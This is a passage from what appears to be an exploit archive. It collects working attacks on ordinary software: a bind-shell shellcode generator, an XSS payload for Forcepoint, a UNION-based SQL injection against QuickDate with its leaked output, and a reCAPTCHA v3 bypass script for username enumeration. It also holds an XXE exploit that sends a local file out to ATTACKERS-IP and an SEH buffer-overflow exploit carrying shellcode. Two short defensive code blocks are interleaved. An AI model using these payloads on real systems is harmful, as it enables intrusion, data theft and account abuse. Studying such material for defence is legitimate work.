scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt

# Initiate the Shellcode variable we will output
shellcode = ""

# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
    shellcode += '\\x'
    shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
    shellcode += '\\x'
    shellcode += '%02x' %x

print "Choose your shellcode export format."
exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
if exportFormat == "2" :
    formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
    print "[-----------------------Your-Shellcode------------------------]"
    print 'shellcode = "'+formatSC+'"'
else :
    formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
    print "[----------------Your-Shellcode------------------]"
    print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'


Forcepoint WebSecurity 8.5 Cross Site Scripting


Forcepoint WebSecurity version 8.5 suffers from a cross site scripting vulnerability.


MD5 | 141e6e362032cd8686d01406f6b26649

# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Author: Prasenjit Kanti Paul
# Vendor Homepage: https://www.forcepoint.com/
# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
# Version: Forcepoint Web Security 8.5
# Tested on: Windows 7,10 and Linux Mint
# CVE : CVE-2019-6146
# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
# Video PoC: https://youtu.be/NfXGaNVK6eE

# Description: The user must visit a site that is restricted per
# Forcepoint policy, so that Forcepoint Web Security shows its generic
# block page. While rendering the "Domain Name" in that generic page,
# Forcepoint does not validate the Host header, which causes XSS.

Let's assume that, while accessing anysite.com, Forcepoint Web Security prevents
us from going to that website with its custom exception/blocking page. Now
follow the steps below:

*Steps*:

1. Intercept the traffic while accessing https://anysite.com
2. Modify the Host header from anysite.com to ">
<script>alert("evilsite")</script>

*Timeline:*

- Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
- Oct. 23, 2019 - ForcePoint team confirms the issue
- Oct. 24, 2019 - CVE-2019-6146 has been assigned
- Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes


*Regards,*
*Prasenjit Kanti Paul*

QuickDate 1.3.2 SQL Injection


QuickDate version 1.3.2 suffers from a remote SQL injection vulnerability.


MD5 | f2edf1bbfd6b35a274e7d0fc1835c365

# Exploit Title: QuickDate 1.3.2 - SQL Injection
# Dork: N/A
# Date: 2020-02-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://quickdatescript.com/
# Version: 1.3.2
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
#
POST /find_matches HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 425
Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
#
#
HTTP/1.1 200 OK
Date: Thu, 06 Feb 2020 15:05:34 GMT
Server: Apache
Connection: Keep-alive, close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: application/json; charset=UTF-8
Content-Length: 3844

{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
#

Google Invisible RECAPTCHA 3 Spoof Bypass


Google Invisible RECAPTCHA version 3 suffers from a spoofing bypass vulnerability.


MD5 | 03e20cd2aa23071dfe0c93c4d8a7b255

# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass
# Date: 2020-02-07
# Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible
# Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass
# Exploit Author: Matamorphosis
# Tested on: Windows and Ubuntu 19.10
# Category: Web Apps

--------------------------------------------------------------------------------------------
RECAPTCHA Bypass:
--------------------------------------------------------------------------------------------
This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victim's site key.

What makes a site vulnerable?
1. They are using Version 3 of Google's Invisible RECAPTCHA
2. They allow the site key to be used on "localhost". However, while currently untested, you could try adding the DNS name of the target you are attacking and resolving it to 127.0.0.1 in your hosts file.

NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit.

--------------------------------------------------------------------------------------------
PREREQUISITES:
--------------------------------------------------------------------------------------------
The instructions supplied are written for Debian-based Linux distributions. However, this can be set up on any OS with relative ease.
1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/
2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nux just copy the file to /usr/bin
```
user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver
```
3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file.
```
user@linux:~$ sudo apt install python3 python3-pip -y
```
4. Now install the prerequisistes
```
user@linux:~$ pip3 install -r requirements.txt
```

--------------------------------------------------------------------------------------------
USAGE:
--------------------------------------------------------------------------------------------
1. Obtain the site key from the target web application. There should be JavaScript that looks like the following (use the browser's inspect element function to view it); the site key appears in two places:
```
<script src="https://www.google.com/recaptcha/api.js?render=<SITE-KEY-HERE>"></script>
<script>
  grecaptcha.ready(function() {
    grecaptcha.execute('<SITE-KEY-HERE>', {action:'validate_captcha'})
    .then(function(token) {
      // add token value to form
      document.getElementById('g-recaptcha-response').value = token;
    });
  });
</script>
```
2. Open the index.html file and paste the Site Key into the appropriate locations.
3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly, in the body of the index.html file, ensure you are using the appropriate method ("GET" or "POST") and that you are submitting to the correct destination.
```
<body>
  <form id="form_id" method="<METHOD GOES HERE>" action="<VICTIM FORM SUBMISSION LINK>">
    <input type="hidden" id="g-recaptcha-response" name="captcha">
    <input id="accName" type="text" name="accountName" value="">
    <input id="uName" type="text" name="username" value="">
    <input type="submit" value="Submit">
  </form>
</body>
```
*For steps 4-6, example code has already been provided, but ensure it matches the site you are targeting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.*

4. Next you will need to add the following lines to the body of the JavaScript already inside of the <script> tags in the head of the html, after the last line.
```
var url_string = window.location.href;
var url = new URL(url_string);
```
5. After this you need to add the following lines **for each** visible <input> tag in the form you are attacking. This code will automatically take what parameters are provided to the page and set the input elements accordingly.
```
var paramValue1 = url.searchParams.get("accountName");
var account = document.getElementById("accName");
account.value = paramValue1;
```
6. Lastly, add the following lines after you have added JavaScript for each of the <input> tags:
```
var frm = document.getElementById("form_id");
frm.submit();
```
7. Now you need to edit the enumerate.py file to suit your needs. First, change the function to suit the parameters required by your index.html file. In the example below I am trying to enumerate usernames for an account name that is the same every time. Note: you must use "localhost" or a DNS name; using "127.0.0.1" or another IP address will probably not work.
```
accountName = 'testAccount'

def attempt(user):
    driver = webdriver.Firefox()
    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
```
8. Every time the above function is called, a new Firefox window is opened and the link is loaded. This lets the JavaScript execute to obtain the needed CAPTCHA token, which is automatically forwarded on to the destination. *If you get this working in headless mode, kindly contribute your changes to this repository.* After this, create a threaded for loop to suit your needs that iterates through a list and calls the above function for each attempt:
```
for user in ['user1', 'user2', 'user3']:
    thread = threading.Thread(target=attempt, args=(user,))
    thread.start()
```
9. You are now ready to run the exploit. In one terminal session, start the web server; it listens on localhost, TCP port 8000. You can change these settings by editing the http_serve.py file:
```
user@linux:~$ python3 http_serve.py
```
10. In another terminal session, run the enumerate.py script and watch it run!
```
user@linux:~$ python3 enumerate.py
```
--------------------------------------------------------------------------------------------
FILES:
--------------------------------------------------------------------------------------------
---- http_serve.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
import http.server
import socketserver

PORT = 8000

Handler = http.server.SimpleHTTPRequestHandler

httpd = socketserver.TCPServer(("localhost", PORT), Handler)

print("serving at port", PORT)
httpd.serve_forever()

--------------------------------------------------------------------------------------------
---- enumerate.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading

accountName = 'foobar'

def attempt(user):
    # Each call opens a new Firefox window and loads the local spoofed page;
    # the page's own JavaScript fills the form and submits it.
    driver = webdriver.Firefox()
    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')

# One thread per candidate username
for user in ['user1', 'user2', 'user3']:
    thread = threading.Thread(target=attempt, args=(user,))
    thread.start()

--------------------------------------------------------------------------------------------
---- index.html ----
--------------------------------------------------------------------------------------------
<!DOCTYPE html>
<html>
<head>
  <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TYDIjJAqCk6g335bFk3AjlC3/recaptcha__en.js"></script>
  <script src="https://www.google.com/recaptcha/api.js?render=<SITE_KEY_GOES_HERE>"></script>
  <script>
    grecaptcha.ready(function() {
      // do request for recaptcha token
      // response is promise with passed token
      grecaptcha.execute('<SITE_KEY_GOES_HERE>', {action:'validate_captcha'})
      .then(function(token) {
        // add token value to form
        document.getElementById('g-recaptcha-response').value = token;
        var url_string = window.location.href;
        var url = new URL(url_string);
        var paramValue1 = url.searchParams.get("accountName");
        var account = document.getElementById("accName");
        account.value = paramValue1;
        var paramValue2 = url.searchParams.get("username");
        var uname = document.getElementById("uName");
        uname.value = paramValue2;
        var frm = document.getElementById("form_id");
        frm.submit();
      });
    });
  </script>
</head>
<body>
  <form id="form_id" method="<METHOD>" action="<VICTIM FORM SUBMISSION LINK>">
    <input type="hidden" id="g-recaptcha-response" name="captcha">
    <input id="accName" type="text" name="accountName" value="">
    <input id="uName" type="text" name="username" value="">
    <input type="submit" value="Submit">
  </form>
</body>
</html>
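Precondition 2 above (a site key that is also accepted on "localhost") only bites when the protected site trusts `"success": true` alone. The server-side check that closes that gap, as an added example in Python that is not part of the exploit repository: it evaluates the siteverify reply's `hostname`, `action` and `score` against what the site expects. The sample replies are constructed (real field names, made-up values) and `www.example.com` is a placeholder hostname.

```python
import json
import urllib.parse
import urllib.request

SITEVERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"


def evaluate_siteverify(resp, expected_action, allowed_hostnames, min_score=0.5):
    """Decide whether a siteverify reply proves the token was minted on one of
    our own hostnames for the expected action. Returns (accepted, reason)."""
    if not resp.get("success"):
        return False, "token rejected by Google: %s" % resp.get("error-codes", [])
    # A key that also works on "localhost" still yields "success": true for a
    # token minted there, so the hostname has to be checked by the site itself.
    host = resp.get("hostname")
    if host not in allowed_hostnames:
        return False, "token minted on unexpected host %r" % host
    if resp.get("action") != expected_action:
        return False, "action mismatch: %r" % resp.get("action")
    score = float(resp.get("score", 0.0))
    if score < min_score:
        return False, "score %.2f below threshold %.2f" % (score, min_score)
    return True, "ok"


def verify_token(secret, token, remote_ip=None, timeout=5):
    """Exchange the client-side token for a siteverify reply (network call;
    not exercised by the constructed samples below)."""
    fields = {"secret": secret, "response": token}
    if remote_ip:
        fields["remoteip"] = remote_ip
    body = urllib.parse.urlencode(fields).encode()
    with urllib.request.urlopen(SITEVERIFY_URL, data=body, timeout=timeout) as r:
        return json.load(r)


# Constructed sample replies in the shape of the real siteverify JSON; values
# are made up. SPOOFED is what a token from the localhost page would look like,
# GENUINE is a submission from the protected site itself.
SPOOFED = {"success": True, "score": 0.9, "action": "validate_captcha",
           "challenge_ts": "2020-02-07T00:00:00Z", "hostname": "localhost"}
GENUINE = {"success": True, "score": 0.9, "action": "validate_captcha",
           "challenge_ts": "2020-02-07T00:00:00Z", "hostname": "www.example.com"}

if __name__ == "__main__":
    for label, reply in (("spoofed", SPOOFED), ("genuine", GENUINE)):
        ok, why = evaluate_siteverify(reply, "validate_captcha", {"www.example.com"})
        print(label, "accepted" if ok else "rejected", why)
```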

ExpertGPS 6.38 XML Injection


ExpertGPS version 6.38 suffers from an XML external entity injection vulnerability.


MD5 | 4e1090a6488fa7a932e6937630a5772a

[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
[+] Date: 2019-12-07
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: https://www.topografix.com/
[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe
[+] Disclosed at: 7FEB2020
[+] Version: 6.38
[+] Tested on: Windows 10
[+] CVE: N/A

==================
Background:
==================
ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellan, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format, which is based on XML.

==================
Vulnerability:
==================
By having a user import a crafted .gpx file (an XML-based GPS data file), it is possible to execute an XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.) Open ExpertGPS.exe
2.) Select File -> Import Data from Other Programs...
3.) Select the crafted route.gpx file (with a listener open on ATTACKERS-IP) and click "Open".

==================
Proof of Concept:
==================

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">


c.) Exploited "route.xml"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
  %sp;
  %param1;
  %exfil;
]>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd">
  <metadata>
    <bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
    <extensions>
      <time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time>
      <active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700">
      </active_point>
    </extensions>
  </metadata>
  <wpt lat="38.89767500" lon="-77.03654700">
    <time>2019-12-08T03:35:44.732Z</time>
    <name>1600PennsylvaniaAvenuenWashingt</name>
    <cmt>1600 Pennsylvania Avenue
Washington</cmt>
    <desc>1600 Pennsylvania Avenue
Washington, DC 20500</desc>
    <sym>City (Small)</sym>
    <type>Address</type>
    <extensions>
      <label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3">
        <label_text>1600 Pennsylvania Avenue
Washington, DC 20500</label_text>
      </label>
      <gpxx:WaypointExtension>
        <gpxx:Address>
          <gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
          <gpxx:City>Washington</gpxx:City>
          <gpxx:State>DC</gpxx:State>
          <gpxx:Country>United States</gpxx:Country>
          <gpxx:PostalCode>20500</gpxx:PostalCode>
        </gpxx:Address>
      </gpxx:WaypointExtension>
      <wptx1:WaypointExtension>
        <wptx1:Address>
          <wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
          <wptx1:City>Washington</wptx1:City>
          <wptx1:State>DC</wptx1:State>
          <wptx1:Country>United States</wptx1:Country>
          <wptx1:PostalCode>20500</wptx1:PostalCode>
        </wptx1:Address>
      </wptx1:WaypointExtension>
    </extensions>
  </wpt>
  <extensions>
  </extensions>
</gpx>


==================
Additional Attack Vectors:
==================
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.
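GPX never needs a DTD, so an importer can refuse any DOCTYPE or external entity reference before anything is expanded. Added example, not ExpertGPS code: a strict expat-based GPX reader in Python that aborts on the DOCTYPE, exercised against a constructed benign waypoint file and a copy carrying the same external parameter entity preamble as the route.xml above.

```python
import xml.parsers.expat

# Constructed samples (not the advisory's files): a plain GPX waypoint, and the
# same document prefixed with a DOCTYPE that pulls in an external parameter
# entity the way route.xml above does.
BENIGN_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="sample">
  <wpt lat="38.89767500" lon="-77.03654700"><name>Sample</name></wpt>
</gpx>"""
HOSTILE_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
%sp;
]>""" + BENIGN_GPX.split(b"?>", 1)[1]


class UnsafeGpxError(ValueError):
    """Raised when a GPX document tries to use a DTD or an external entity."""


def parse_gpx_waypoints(data):
    """Return [(lat, lon), ...] from GPX bytes. Any DOCTYPE or external entity
    reference raises UnsafeGpxError before the parser expands anything."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    waypoints = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeGpxError("DOCTYPE not permitted in GPX input")

    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeGpxError("external entity refused: %r" % (sysid,))

    def on_start(tag, attrs):
        if tag.rsplit(" ", 1)[-1] == "wpt":  # drop the namespace URI prefix
            waypoints.append((float(attrs["lat"]), float(attrs["lon"])))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return waypoints


def gpx_is_accepted(data):
    """True if the file parses under the strict policy, False if it was refused."""
    try:
        parse_gpx_waypoints(data)
        return True
    except (UnsafeGpxError, xml.parsers.expat.ExpatError):
        return False
```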

Wedding Slideshow Studio 1.36 Buffer Overflow


Wedding Slideshow Studio version 1.36 suffers from a buffer overflow vulnerability.


MD5 | 7d61e1ee75320bf8d949aaa53ba8ea59

#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help"> "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key"> Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python

from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a)
#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
